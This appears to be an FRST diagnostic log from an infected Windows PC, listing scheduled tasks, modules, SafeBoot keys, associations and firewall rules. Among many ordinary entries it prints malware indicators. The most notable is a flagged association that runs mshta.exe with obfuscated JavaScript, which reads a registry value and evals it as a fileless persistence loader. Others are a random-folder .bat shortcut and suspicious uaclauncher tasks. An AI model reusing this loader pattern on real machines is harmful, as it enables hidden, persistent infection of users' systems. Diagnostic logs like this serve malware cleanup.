==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1D4FCD0B-833F-4673-AF4F-C1D32AB526D0} - System32\Tasks\{0DCDAAAA-93EF-49E2-AA0E-3E402E8F35FA} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {23C4AFE3-C344-4CC1-B947-6F7861B09475} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {34DEFD4E-26EB-489B-B544-9DCC0C99C02E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-08] (Adobe Systems Incorporated)
Task: {3BA2D665-D4D2-44EB-A14C-4B1628C5D38D} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2016-09-13] (PC-Doctor, Inc.)
Task: {4680A0DC-A27E-4500-8101-3C3720F498FC} - System32\Tasks\{CCA1CD58-709C-423B-BBBB-0C7DBE39E355} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {51B3635B-5D21-4E7D-A92A-01533537CCD7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-06-02] (AVAST Software)
Task: {555CC1F2-72BC-40E7-869B-59C3B9120774} - System32\Tasks\{6418743D-1170-48C9-9BCE-CBDA001F2EF3} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {5AC7F887-71CA-4AA1-96A4-0A5E34D1F1BB} - System32\Tasks\AdobeAAMUpdater-1.0-Owner-PC-Owner => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {67A0DA7E-E534-48A2-8A20-44047E59A2D5} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {6C79847C-860A-4953-AA45-A65B21DF1150} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
Task: {800C4F0A-B96F-4306-8FC6-01AABCB3E309} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {828E25EE-E30B-477C-BB58-2F53210A9F30} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\Windows\TEMP\DeleteFolderTask.exe [2016-01-29] () <==== ATTENTION
Task: {8DCDEE16-AEB7-42B2-B7F8-C48F3E74066D} - System32\Tasks\SafeZone scheduled Autoupdate 1458696918 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-09-06] (Avast Software)
Task: {8EBB3B0F-59FA-41FE-899B-DF576A5B1C11} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {BF380B2F-370F-4DE2-8998-A2681C51FFDB} - System32\Tasks\{B042A631-BD1D-41D8-901A-5601A5BAD7F0} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {D257D2D9-DBD5-4DE2-B470-0269294D41D0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-06-25] (Adobe Systems Incorporated)
Task: {DA220C2C-86E5-4104-9CE4-34070D5F9C3D} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-10-03] (AVAST Software)
Task: {E75EB6BB-4C1C-40AB-A7F7-60D5A2D309FF} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-09-09] (Dell Inc.)
Task: {EEA26988-B289-48A6-A4F5-4F3D5FAB5A80} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {F1C6BBBF-4E97-427D-B1DD-42BD81992A6E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Owner\AppData\Local\c345b\ce9d6.lnk -> C:\Users\Owner\AppData\Local\c345b\a0f5a.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-12-22 21:46 - 2016-07-10 15:17 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-12-21 12:39 - 2016-12-14 12:55 - 02259232 _____ () D:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2016-05-22 18:33 - 2016-05-22 18:33 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-05-28 23:38 - 2016-03-21 12:28 - 01357264 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00169064 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-01-08 10:02 - 2017-01-08 10:02 - 03138056 _____ () C:\Program Files\AVAST Software\Avast\defs\17010801\algo.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00482928 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-02-01 15:29 - 2016-12-08 07:13 - 00656160 _____ () D:\games\SDL2.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 04969248 _____ () D:\games\v8.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01563936 _____ () D:\games\icui18n.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01195296 _____ () D:\games\icuuc.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 02322720 _____ () D:\games\video.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 02549760 _____ () D:\games\libavcodec-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00442880 _____ () D:\games\libavutil-54.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00491008 _____ () D:\games\libavformat-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00332800 _____ () D:\games\libavresample-2.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00485888 _____ () D:\games\libswscale-3.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00838944 _____ () D:\games\bin\chromehtml.DLL
2016-03-14 08:25 - 2016-07-04 14:17 - 00266560 _____ () D:\games\openvr_api.dll
2016-11-17 01:29 - 2016-11-17 01:29 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-10-05 18:18 - 2016-10-05 18:18 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 00189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 02144104 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 07955304 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00341352 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00028008 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00127336 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2016-08-04 13:36 - 2016-11-11 12:36 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-12-21 16:48 - 2016-11-11 12:37 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-08-04 13:36 - 2016-11-11 12:38 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-12-21 16:48 - 2016-11-11 12:38 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-12-21 16:48 - 2016-11-11 12:35 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-12-21 16:48 - 2016-12-21 10:26 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-12-21 16:48 - 2016-11-11 12:42 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-12-21 16:48 - 2016-11-11 12:42 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00171320 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-12-15 08:51 - 2016-12-05 08:21 - 67304736 _____ () D:\games\bin\cef\cef.win7\libcef.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00388384 _____ () D:\games\steam.dll
2016-02-01 15:29 - 2015-09-24 15:52 - 00119208 _____ () D:\games\winh264.dll
2015-09-04 19:34 - 2015-09-04 19:34 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-12-22 21:49 - 2015-01-27 08:26 - 01905904 ____N () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-12-22 21:49 - 2012-11-25 20:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-12-22 21:49 - 2014-02-18 12:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2016-12-15 22:12 - 2016-12-15 22:12 - 17833560 _____ () C:\Users\Owner\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Classes\75a29: "C:\Windows\system32\mshta.exe" "javascript:Dv6Ty="kpDGulS";W8f=new ActiveXObject("WScript.Shell");aCVk71="PBz2";D4kLn=W8f.RegRead("HKCU\\software\\bykshfet\\noce");A4M5Vb="HZmwr";eval(D4kLn);WFchl11xY="O5wuSTc";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\dell.com -> dell.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 18:34 - 2009-06-10 13:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{A543F10B-7594-41E4-BB78-74DD4CFEFAD0}] => D:\games\Steam.exe
FirewallRules: [{504E1E8F-1998-4A28-B535-816B582F3EF7}] => D:\games\Steam.exe
FirewallRules: [{537E98E5-CCC8-4EA6-A3DE-DE239833CEB9}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{27A13F94-FBF5-4304-8E9A-27C8F6377CAE}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{DF55312E-A87E-4636-9AEB-22CC4CCFCED8}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A598F13A-E577-4115-B96F-75DAADDCA32E}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DC82047C-F571-4D27-AE47-8E25AA709F8C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{97F1E280-1F58-4036-8D3B-A4AB0AFDE07C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{4336F6A7-BFB9-4856-AE41-9969159C373D}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{E3E49540-DA16-4843-B75D-9709FB44CEE9}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{B8000D5F-C3DC-463D-A5DE-01CCDB10685D}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{97499616-5698-43D4-B1F0-BC20871CD2D2}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5BE8033D-6848-4D0F-B23F-F6914ACE3BF2}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{304386CC-06C8-4836-B0F5-5678DFED9F8E}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{5B04FA9C-9A62-471F-9BFF-CC5BC42E009D}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{FD172805-0AC1-4E21-B2AC-FE3602F0B65A}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1106F23D-44B2-447D-8DF2-D0A0E5637D22}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1F93974D-31E5-4699-BE57-C8FF207FA657}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{DB8073E7-FBA9-486A-9BCA-13E3B5BFC64E}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{AF4FD28D-EECE-42FD-A184-44C5AE397016}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{5DAA871E-4CE0-4FB2-863D-83DC31CA1402}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{82E3BF6E-DB47-4974-A63F-F880E93F9B57}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{63875D53-438A-4457-8643-5BC6ED626346}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{8A1060E2-36CD-424E-9320-E311EB56BE35}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{2ED9BF3A-D02D-4E47-9BCC-55A8AA11AA26}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{0D06A544-D362-47A6-B2D4-EEE52EF403FB}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{53406011-FA4B-4CBE-97D5-97483A8E0E10}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5B050F35-85EF-46DD-8FF1-33E6847C2206}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{837B45AC-549E-44FE-AD60-EBE4C5528D20}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{98EB06F7-102D-4163-8D4C-A7DA95FF8468}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{3A940815-874F-4B98-8ADD-8914CBE6FDBD}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{06543AA5-9AA0-4C9F-B015-165FFE1C7091}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{41219093-1F3B-4F4C-9F25-1055F0D075CF}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{B4AB56C1-ACE3-49B3-812B-9B328A5B41A4}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [{F322558A-051F-411A-A513-080FDF36E289}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [TCP Query User{F244CCA8-2669-4C85-A321-8B0D07B5380D}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
FirewallRules: [UDP Query User{207FEB91-B9A5-48B7-86A9-1B8C55CB59E8}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
FirewallRules: [{0B28010B-E6EB-4914-9602-14B85B47BD0A}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
